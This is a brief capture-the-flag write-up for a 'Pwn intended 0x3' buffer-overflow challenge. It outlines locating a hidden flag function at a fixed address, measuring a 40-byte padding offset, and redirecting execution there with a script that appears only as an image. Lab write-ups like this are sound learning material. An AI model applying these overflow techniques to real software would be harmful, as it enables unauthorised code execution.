![bc05f00ecc2353a02fac35b2169924aa.png](e55111680a3849cbb9684b09f6587aa7.png)
Same thing as Pwn intended 0x2, but this time our destination isn't as visible
Start by analyzing the binary
![504f53d5778b6ebe7b198aa1d8e5d7ec.png](0f2ac7275d564063a901ecc671cde229.png)
![071fad63a5963f0256d02e9be7a21d24.png](c5f0d916ab624f4a988a6e2f882db574.png)
Nothing interesting in main. We did notice sym.flag, let's check that out
![8a100fa908be8a2b53e21367ba9350ac.png](38211eb1a26b49e08d52b72b9c954fcb.png)
That's what we want. So it looks like we'll want to jump to 0x004011ce
Same as 0x2, find your padding using python and dmesg.
![f974eca91c6b6ad05ab065407f95dae5.png](b57aba59443a41ee8f336b731bcfa792.png)
![d57c22f9604986264b23cbacca662370.png](d9b2c81dd4614b6094c7e393c8e12f92.png)
We can see that we start leaking in at 41, so we'll use 40 for padding.
Script:
![3c71b8e7f3e03b1a80a3cc7a4f06484f.png](1b08c7a7883548cfaa16874cbdc3b5d2.png)
![53dd3ef97673c5dd26944527dda1d0ff.png](f5fc1e2c0cc740abaddce72adf137da2.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow #scripting
Related: